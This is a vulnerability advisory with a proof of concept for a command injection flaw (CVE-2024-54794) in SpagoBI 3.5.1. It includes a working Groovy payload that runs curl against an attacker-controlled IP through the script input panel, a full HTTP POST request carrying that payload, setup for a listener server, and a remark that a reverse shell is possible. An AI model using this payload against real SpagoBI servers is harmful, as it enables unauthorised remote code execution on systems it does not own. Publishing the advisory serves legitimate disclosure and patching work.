SpagoBI command injection# CVE-2024-54794
**Severity :** **Critical** (**9.1**)
**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H`
## Summary :
Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **Command Injection** vulnerability in the script input feature.
## Poc
In the Poc the attacker has to be logged into the webapp and write a groovy script that is able to execute os commands.
For this Poc http interaction was reproduced. A reverse shell is possible.
### Steps to Reproduce :
1. Up a webserver for example in linux with: **python3 -m http.server 80**
2. Once having access to the script insertion panel choose grovy as language and insert via gui test the script inserting:
```println+"curl+your_ip".execute()```
Request example after testing the connection :
```html
POST /SpagoBI/servlet/AdapterHTTP?LIGHT_NAVIGATOR_DISABLED=true&PAGE=detailModalitiesValuePage HTTP/1.1
Host: <host>
Cookie: <cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/131.0.2903.86
Content-type: application/x-www-form-urlencoded
id=8&MESSAGEDET=DETAIL_MOD&lovProviderModified=true&testLovBeforeSave.x=10&testLoveBeforeSave.y=14&label=test2&name=test2&description=test2&input_type=SCRIPT%2C2&datasource=TopView&queryDef=&LANGUAGESCRIPT=groovy&SCRIPT=println+%22curl+10.246.6.140%22.execute%28%29.test&javaClassName=&valueOfFixedLovItemNew=&dataset=&datasetReadLabel=
```
## Affected Version Details :
- <= 3.5.1
## Impact :
The attacker, if having access to the webapp with such grants to write scripts, can execute arbirary code without restriction on the machine.
## Mitigation :
- Disable the script input form. Update to the latest version.
## References :
-
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view